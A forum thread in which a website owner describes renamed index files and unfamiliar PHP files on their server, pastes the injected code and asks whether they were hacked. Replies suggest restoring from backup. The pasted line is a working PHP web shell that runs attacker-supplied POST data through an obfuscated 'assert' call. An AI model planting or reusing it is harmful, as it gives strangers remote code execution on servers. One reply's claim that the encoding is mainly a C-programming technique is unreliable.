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so I noticed a drop in my SEO search results off google and then I went to go change my meta keywords in my index.html page.

I noticed that my index.html was changed to index1.html and then duplicated to index.php

this code was added to the very top of that php code

This file was also added to my files hagdfi.php and

so was this one border.php

<?php $c=base64_decode('YXNzZXI=').$_GET[n].'t';@$c($_POST[x]);?>abcabcabc

What happened? was I being hacked?



  1. It’s safe to assume that if you didn’t put it there, and you are in control of that page, then it should not be there.

    I would replace the index page with a backup and then see if you can find out through your provider how to keep it from happening again.

    Trust nothing, verify everything!

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  2. you have been hacked. the code in the file has been encoded. I don’t mastering this encoding but it’s more using in c programming. you can use this for analysing the file :

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